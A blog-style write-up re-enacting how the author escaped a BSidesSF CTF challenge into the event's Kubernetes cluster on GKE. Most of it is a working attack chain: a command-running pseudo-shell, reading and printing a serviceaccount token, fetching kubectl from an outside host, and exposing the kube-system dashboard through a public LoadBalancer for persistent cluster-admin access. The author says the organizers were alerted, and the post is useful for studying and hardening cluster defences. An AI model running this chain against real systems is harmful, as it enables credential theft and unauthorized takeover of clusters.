Re-enactment of the BSidesSF CTF infra own
This is a rough re-enactment of the steps that were carried out.
Once basic remote execution was established, I constructed a pseudo-shell using a filesystem watcher.
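The watcher itself isn't reproduced in this post, but a minimal sketch of the idea looks roughly like the following. The paths, file extensions, and polling loop (instead of inotify) are made up for illustration; the real thing just needs somewhere writable to drop command lists and read results back.

```python
# Hypothetical sketch of the pseudo-shell watcher: poll a drop directory for
# JSON-encoded command lists, run each one, and write the combined output back
# next to the request file. Paths and extensions here are illustrative only.
import json
import os
import subprocess
import time

DROP_DIR = '/tmp/.cmds'   # assumption: any directory the injected code can write to

def watch(poll_interval=1.0):
    os.makedirs(DROP_DIR, exist_ok=True)
    while True:
        for name in os.listdir(DROP_DIR):
            if not name.endswith('.cmd'):
                continue
            path = os.path.join(DROP_DIR, name)
            with open(path) as f:
                command = json.load(f)   # e.g. ['id'] or ['sh', '-c', 'mount']
            result = subprocess.run(command, capture_output=True, text=True)
            with open(path[:-len('.cmd')] + '.out', 'w') as out:
                out.write(result.stdout + result.stderr)
            os.remove(path)
        time.sleep(poll_interval)

if __name__ == '__main__':
    watch()
```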
command = ['id']
uid=1001(worker) gid=0(root) groups=0(root)
We have basic shell execution; let's start exploring a bit.
command = ['which', 'curl']
/usr/bin/curl
OK cool, we have some tools.
command = ['cat', '/etc/hosts']
# Kubernetes-managed hosts file.
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
fe00::0 ip6-mcastprefix
fe00::1 ip6-allnodes
fe00::2 ip6-allrouters
10.0.2.16 zumbo-609050369-nsz0m
Kubernetes, huh...
command = ['sh', '-c', 'mount']
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu type cgroup (ro,nosuid,nodev,noexec,relatime,cpu)
cgroup on /sys/fs/cgroup/cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpuacct)
cgroup on /sys/fs/cgroup/blkio type cgroup (ro,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/memory type cgroup (ro,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/devices type cgroup (ro,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (ro,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls type cgroup (ro,nosuid,nodev,noexec,relatime,net_cls)
cgroup on /sys/fs/cgroup/perf_event type cgroup (ro,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/net_prio type cgroup (ro,nosuid,nodev,noexec,relatime,net_prio)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (ro,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/pids type cgroup (ro,nosuid,nodev,noexec,relatime,pids)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda1 on /dev/termination-log type ext4 (rw,relatime,data=ordered)
tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,data=ordered)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,data=ordered)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,mode=755)
tmpfs on /proc/timer_stats type tmpfs (rw,nosuid,mode=755)
Ooh la la: /run/secrets/kubernetes.io/serviceaccount
command = ['sh', '-c', 'ls -al /run/secrets/kubernetes.io/serviceaccount']
drwxrwxrwt 3 root root 140 Mar 30 02:11 .
drwxr-xr-x 3 root root 4096 Mar 30 02:11 ..
drwxr-xr-x 2 root root 100 Mar 30 02:11 ..3983_30_03_02_11_15.354325550
lrwxrwxrwx 1 root root 31 Mar 30 02:11 ..data -> ..3983_30_03_02_11_15.354325550
lrwxrwxrwx 1 root root 13 Mar 30 02:11 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Mar 30 02:11 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Mar 30 02:11 token -> ..data/token
command = ['sh', '-c', 'cat /run/secrets/kubernetes.io/serviceaccount/token']
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tMGJka3AiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImVhYmVhMzVkLWYxNTUtMTFlNi04MWQ5LWVhYjJlOTBkZjJjMCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Mc2xGFHzUgAktvckobBnawRCq7shrhD8KAHitCsfbWscpEwZaWAS6GhYL2t_MAVT6cK4P1OMv8_bqX_lE0A2wT_O0BJC_vw_Y80ZJgrUPodfZ65pkBRwNn6WUV9BH-LWDHIPJ48NT3gFcwgaP-h8RX1WCa_-b6ORTKPfZ0UMn62G2fEyZevNbds25aqhu54LREy7sLh8KJEmUw4bNnJB66lNJntwRQFPohkCWjpedT8fT-KKFsqhYLTGBFSQo9S3N50uMrxQkdY7zpt1yRBIrUOArtCETEoFSblQSpX2n2i_K-F71v5FLpcsTgRVoKUpFtOdVk9EeTXY0lmtq0zgRQ
Wonderful, looks like a JWT.
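The payload is just base64, so it can be decoded without verifying the signature to confirm which service account it belongs to. A quick sketch, reading the token from the mount shown above:

```python
# Decode the JWT payload (the middle segment) to read the serviceaccount
# claims; no signature verification is needed just to look at it.
import base64
import json

token = open('/run/secrets/kubernetes.io/serviceaccount/token').read().strip()
payload = token.split('.')[1]
payload += '=' * (-len(payload) % 4)   # restore the padding JWTs strip off
claims = json.loads(base64.urlsafe_b64decode(payload))
print(json.dumps(claims, indent=2))
# iss: kubernetes/serviceaccount, namespace: default,
# secret.name: default-token-0bdkp, service-account.name: default
```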
command = 'curl -Lo /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.5.3/bin/linux/amd64/kubectl'.split(' ')
rule of silence. golden.
command = ['sh', '-c', 'ls -alh /tmp']
drwxrwxrwt 2 root root 4.0K Mar 30 02:57 .
drwxr-xr-x 61 root root 4.0K Mar 30 02:33 ..
-rw-r--r-- 1 worker root 49M Mar 30 02:57 k
zumbo runs with 4 replicas, so some of these commands were repeated to ensure every pod was targeted. The re-running is omitted for brevity.
command = ['sh', '-c', 'chmod +x /tmp/k; /tmp/k']
kubectl controls the Kubernetes cluster manager.
Find more information at https://github.com/kubernetes/kubernetes.
Basic Commands (Beginner):
create Create a resource by filename or stdin
expose Take a replication controller, service, deployment or pod and expose it as a new Kubernetes Service
run Run a particular image on the cluster
set Set specific features on objects
Basic Commands (Intermediate):
get Display one or many resources
explain Documentation of resources
edit Edit a resource on the server
delete Delete resources by filenames, stdin, resources and names, or by resources and label selector
Deploy Commands:
rollout Manage a deployment rollout
rolling-update Perform a rolling update of the given ReplicationController
scale Set a new size for a Deployment, ReplicaSet, Replication Controller, or Job
autoscale Auto-scale a Deployment, ReplicaSet, or ReplicationController
Cluster Management Commands:
certificate Modify certificate resources.
cluster-info Display cluster info
top Display Resource (CPU/Memory/Storage) usage
cordon Mark node as unschedulable
uncordon Mark node as schedulable
drain Drain node in preparation for maintenance
taint Update the taints on one or more nodes
Troubleshooting and Debugging Commands:
describe Show details of a specific resource or group of resources
logs Print the logs for a container in a pod
attach Attach to a running container
exec Execute a command in a container
port-forward Forward one or more local ports to a pod
proxy Run a proxy to the Kubernetes API server
cp Copy files and directories to and from containers.
Advanced Commands:
apply Apply a configuration to a resource by filename or stdin
patch Update field(s) of a resource using strategic merge patch
replace Replace a resource by filename or stdin
convert Convert config files between different API versions
Settings Commands:
label Update the labels on a resource
annotate Update the annotations on a resource
completion Output shell completion code for the given shell (bash or zsh)
Other Commands:
api-versions Print the supported API versions on the server, in the form of "group/version"
config Modify kubeconfig files
help Help about any command
version Print the client and server version information
Use "kubectl <command> --help" for more information about a given command.
Use "kubectl options" for a list of global command-line options (applies to all commands).
We are now exec'ing the Kubernetes CLI inside the pods.
command = ['sh', '-c', 'chmod +x /tmp/k; /tmp/k get ns']
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
This took a bit to get around, but simply pointing KUBECONFIG at an empty file lets us move forward.
command = ['sh', '-c', 'chmod +x /tmp/k; touch /tmp/c; KUBECONFIG=/tmp/c /tmp/k get ns']
default Active 45d
kube-system Active 45d
Originally I went through set-credentials (the commented-out command below), but it turns out that's not even necessary: kubectl stats the serviceaccount token on its own:
stat("/var/run/secrets/kubernetes.io/serviceaccount/token", {st_mode=S_IFREG|0644, st_size=846, ...}) = 0
#command = ['sh', '-c', 'chmod +x /tmp/k; touch /tmp/c; KUBECONFIG=/tmp/c /tmp/k config set-credentials foo --token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tMGJka3AiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6ImVhYmVhMzVkLWYxNTUtMTFlNi04MWQ5LWVhYjJlOTBkZjJjMCIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.Mc2xGFHzUgAktvckobBnawRCq7shrhD8KAHitCsfbWscpEwZaWAS6GhYL2t_MAVT6cK4P1OMv8_bqX_lE0A2wT_O0BJC_vw_Y80ZJgrUPodfZ65pkBRwNn6WUV9BH-LWDHIPJ48NT3gFcwgaP-h8RX1WCa_-b6ORTKPfZ0UMn62G2fEyZevNbds25aqhu54LREy7sLh8KJEmUw4bNnJB66lNJntwRQFPohkCWjpedT8fT-KKFsqhYLTGBFSQo9S3N50uMrxQkdY7zpt1yRBIrUOArtCETEoFSblQSpX2n2i_K-F71v5FLpcsTgRVoKUpFtOdVk9EeTXY0lmtq0zgRQ; KUBECONFIG=/tmp/c /tmp/k get ns']
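Incidentally, kubectl isn't strictly required at this point: the mounted token and ca.crt are enough to talk to the API server directly. A rough sketch of that, not part of the original run, assuming the standard in-cluster DNS name kubernetes.default.svc:

```python
# List namespaces straight from the API server using the mounted serviceaccount
# credentials; roughly what kubectl's in-cluster fallback is doing for us.
import json
import ssl
import urllib.request

SA = '/run/secrets/kubernetes.io/serviceaccount'
token = open(SA + '/token').read().strip()

ctx = ssl.create_default_context(cafile=SA + '/ca.crt')
req = urllib.request.Request(
    'https://kubernetes.default.svc/api/v1/namespaces',
    headers={'Authorization': 'Bearer ' + token},
)
with urllib.request.urlopen(req, context=ctx) as resp:
    for item in json.load(resp)['items']:
        print(item['metadata']['name'])   # default, kube-system
```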
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get po']
NAME READY STATUS RESTARTS AGE
fluentd-cloud-logging-gke-cluster-1-default-pool-f674663f-hlfq 1/1 Running 0 22h
fluentd-cloud-logging-gke-cluster-1-pool-1-c18e5b97-pfj3 1/1 Running 0 6m
fluentd-cloud-logging-gke-cluster-1-pool-1-c18e5b97-vnsv 1/1 Running 0 6m
heapster-v1.2.0.1-1382115970-6t6t4 2/2 Running 0 21h
kube-dns-4101612645-1p6l3 4/4 Running 0 22h
kube-dns-autoscaler-2715466192-nwh5j 1/1 Running 0 22h
kube-proxy-gke-cluster-1-default-pool-f674663f-hlfq 1/1 Running 0 22h
kube-proxy-gke-cluster-1-pool-1-c18e5b97-pfj3 1/1 Running 0 7m
kube-proxy-gke-cluster-1-pool-1-c18e5b97-vnsv 1/1 Running 0 7m
kubernetes-dashboard-3543765157-88p5s 1/1 Running 0 22h
l7-default-backend-2234341178-rs38c 1/1 Running 0 22h
Beautiful, let's continue.
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get svc']
NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend 10.3.242.234 <nodes> 80:30564/TCP 22h
heapster 10.3.252.64 <none> 80/TCP 22h
kube-dns 10.3.240.10 <none> 53/UDP,53/TCP 22h
kubernetes-dashboard 10.3.241.52 <none> 80/TCP 22h
Let's punch open a hole and gain persistence through other means.
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system expose deployment kubernetes-dashboard --name=kpub --type=LoadBalancer']
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
Hm, 500...
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get svc']
NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend 10.3.242.234 <nodes> 80:30564/TCP 22h
heapster 10.3.252.64 <none> 80/TCP 22h
kpub 10.3.252.201 <pending> 9090:31487/TCP 17s
kube-dns 10.3.240.10 <none> 53/UDP,53/TCP 22h
kubernetes-dashboard 10.3.241.52 <none> 80/TCP 22h
\o/ Pending! I can already tell this cluster is running on GKE, but as long as it's in an environment that allows type=LoadBalancer service provisioning, we can open up other inroads.
command = ['sh', '-c', 'KUBECONFIG=/tmp/c /tmp/k --namespace=kube-system get svc']
NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend 10.3.242.234 <nodes> 80:30564/TCP 22h
heapster 10.3.252.64 <none> 80/TCP 22h
kpub 10.3.252.201 104.199.126.106 9090:31487/TCP 59s
kube-dns 10.3.240.10 <none> 53/UDP,53/TCP 22h
kubernetes-dashboard 10.3.241.52 <none> 80/TCP 22h
Now http://104.199.126.106:9090/ is publicly reachable.
From here I started, ran, and exposed containers that would allow me to keep cluster-admin access. I also alerted the organizers and avoided spoiling the fun.
-tmc